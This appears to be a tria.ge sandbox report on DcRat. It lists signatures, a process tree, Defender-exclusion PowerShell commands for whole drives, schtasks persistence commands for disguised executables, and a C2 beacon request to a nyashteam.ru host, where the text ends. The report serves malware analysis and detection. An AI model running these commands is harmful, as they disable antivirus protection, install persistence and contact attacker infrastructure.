Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    27/11/2024, 09:00 UTC

General

  • Target

    930040236d537be63b44b58c59f263d25d9af869abedff8e80d87157b99a6246.exe

  • Size

    4.9MB

  • MD5

    5103a1bb4e59cbcc9d05cc7905681c9f

  • SHA1

    2ef27ea1ad70d19c214586cf8f44a03853c6fdf1

  • SHA256

    930040236d537be63b44b58c59f263d25d9af869abedff8e80d87157b99a6246

  • SHA512

    fc6aef981ab43609850d0b2e79fa4d22646c439f12a267b177b00a67afc1879000f195f1677b24f60250bc8839c4825294b094a902fece31942e8b8ef0ecf33a

  • SSDEEP

    49152:rl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8s:U

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 42 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 36 IoCs
  • DCRat payload 1 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 11 IoCs
  • Checks whether UAC is enabled 1 TTPs 24 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 42 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 36 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\930040236d537be63b44b58c59f263d25d9af869abedff8e80d87157b99a6246.exe
    "C:\Users\Admin\AppData\Local\Temp\930040236d537be63b44b58c59f263d25d9af869abedff8e80d87157b99a6246.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2216
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rZ7ZHhiPOX.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1068
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
          PID:1744
        • C:\Program Files\Windows Journal\Templates\taskhost.exe
          "C:\Program Files\Windows Journal\Templates\taskhost.exe"
          3⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:744
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c15071f2-2553-4143-93ed-1cc06c3c9a4d.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:264
            • C:\Program Files\Windows Journal\Templates\taskhost.exe
              "C:\Program Files\Windows Journal\Templates\taskhost.exe"
              5⤵
              • UAC bypass
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:2996
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3a59ff15-d4a8-4b6c-be18-62357791a181.vbs"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1892
                • C:\Program Files\Windows Journal\Templates\taskhost.exe
                  "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                  7⤵
                  • UAC bypass
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:2636
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7e21f904-2c72-498f-9a91-a8782f62a8f3.vbs"
                    8⤵
                      PID:2664
                      • C:\Program Files\Windows Journal\Templates\taskhost.exe
                        "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                        9⤵
                        • UAC bypass
                        • Executes dropped EXE
                        • Checks whether UAC is enabled
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • System policy modification
                        PID:448
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9899cb40-f64f-44b1-9c95-b349664377a0.vbs"
                          10⤵
                            PID:2316
                            • C:\Program Files\Windows Journal\Templates\taskhost.exe
                              "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                              11⤵
                              • UAC bypass
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • System policy modification
                              PID:1744
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41b01c39-9be9-4a89-83c2-4bd4e97b9862.vbs"
                                12⤵
                                  PID:2560
                                  • C:\Program Files\Windows Journal\Templates\taskhost.exe
                                    "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                                    13⤵
                                    • UAC bypass
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • System policy modification
                                    PID:2980
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1318676-ea46-442c-87a3-b862b0ca759f.vbs"
                                      14⤵
                                        PID:1512
                                        • C:\Program Files\Windows Journal\Templates\taskhost.exe
                                          "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                                          15⤵
                                          • UAC bypass
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • System policy modification
                                          PID:2628
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d854631c-3c8c-48f4-8543-08a901dd8c10.vbs"
                                            16⤵
                                              PID:1992
                                              • C:\Program Files\Windows Journal\Templates\taskhost.exe
                                                "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                                                17⤵
                                                • UAC bypass
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • System policy modification
                                                PID:2668
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\735c0725-e514-4baa-a3e7-e4e9e2fefdce.vbs"
                                                  18⤵
                                                    PID:3000
                                                    • C:\Program Files\Windows Journal\Templates\taskhost.exe
                                                      "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                                                      19⤵
                                                      • UAC bypass
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • System policy modification
                                                      PID:2352
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\72d4a45c-742e-4ca9-92c6-bc3d8802b41b.vbs"
                                                        20⤵
                                                          PID:1560
                                                          • C:\Program Files\Windows Journal\Templates\taskhost.exe
                                                            "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                                                            21⤵
                                                            • UAC bypass
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • System policy modification
                                                            PID:2224
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfc3e33c-d6ff-4ea9-83cf-3a96679ff28b.vbs"
                                                              22⤵
                                                                PID:952
                                                                • C:\Program Files\Windows Journal\Templates\taskhost.exe
                                                                  "C:\Program Files\Windows Journal\Templates\taskhost.exe"
                                                                  23⤵
                                                                  • UAC bypass
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • System policy modification
                                                                  PID:2980
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1ad98863-b98c-43a7-9664-e74b183e9e98.vbs"
                                                                    24⤵
                                                                      PID:2088
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d1195625-0e43-4805-bfc2-99bc6dcfcf78.vbs"
                                                                      24⤵
                                                                        PID:1084
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\086b9ecd-4898-48ac-8b78-80565dabfd34.vbs"
                                                                    22⤵
                                                                      PID:2128
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77f30f02-d8f5-4ed2-8a32-0fe04c81ead9.vbs"
                                                                  20⤵
                                                                    PID:2692
                                                              • C:\Windows\System32\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64f43d91-a010-476a-96ee-ce9e27425b46.vbs"
                                                                18⤵
                                                                  PID:2944
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\044c2d56-2083-44de-aa1b-2eb64663692a.vbs"
                                                              16⤵
                                                                PID:2032
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b359fb2c-16cf-4bd0-a2dc-2626e72310ee.vbs"
                                                            14⤵
                                                              PID:2896
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\edfcc716-1fd7-4f7f-ba61-74fb385c3d48.vbs"
                                                          12⤵
                                                            PID:492
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\635eb727-5479-40b3-8184-256bed4d0848.vbs"
                                                        10⤵
                                                          PID:2340
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e275a96c-a3e1-40e8-bf0c-00b7d377e029.vbs"
                                                      8⤵
                                                        PID:1264
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e21e18a4-a39a-4761-b8b1-3b5292df0e59.vbs"
                                                    6⤵
                                                      PID:1904
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\90bf8dd7-a95f-463c-8913-750e3939176d.vbs"
                                                  4⤵
                                                    PID:2736
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Windows\Performance\Idle.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2216
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Performance\Idle.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2504
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Windows\Performance\Idle.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2852
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\System.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2784
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\System.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2764
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\System.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2396
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\Templates\taskhost.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2668
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\Templates\taskhost.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2732
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\Templates\taskhost.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:888
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\wininit.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2884
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\wininit.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2628
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\wininit.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2664
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\csrss.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2328
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\csrss.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2488
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\csrss.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2036
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\services.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1980
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2908
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2540
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Adobe\Updater6\WmiPrvSE.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2604
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Updater6\WmiPrvSE.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2968
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\Updater6\WmiPrvSE.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2032
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\Default\wininit.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2700
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default\wininit.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2952
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Users\Default\wininit.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1064
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\dllhost.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:748
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1856
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2160
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\System.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1060
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\System.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1640
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\System.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2316
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\csrss.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2556
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2572
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2088
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\lsm.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1904
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\lsm.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:796
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\lsm.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3068
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\services.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1532
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\services.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1864
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files\Mozilla Firefox\fonts\services.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2180
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\csrss.exe'" /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:936
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\es-ES\csrss.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1704
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\csrss.exe'" /rl HIGHEST /f
                                              1⤵
                                              • Process spawned unexpected child process
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:376

                                            Network

                                            • flag-us
                                              DNS
                                              81888.cllt.nyashteam.ru
                                              taskhost.exe
                                              Remote address:
                                              8.8.8.8:53
                                              Request
                                              81888.cllt.nyashteam.ru
                                              IN A
                                              Response
                                              81888.cllt.nyashteam.ru
                                              IN A
                                              104.21.2.8
                                              81888.cllt.nyashteam.ru
                                              IN A
                                              172.67.186.200
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH
                                              taskhost.exe
                                              Remote address:
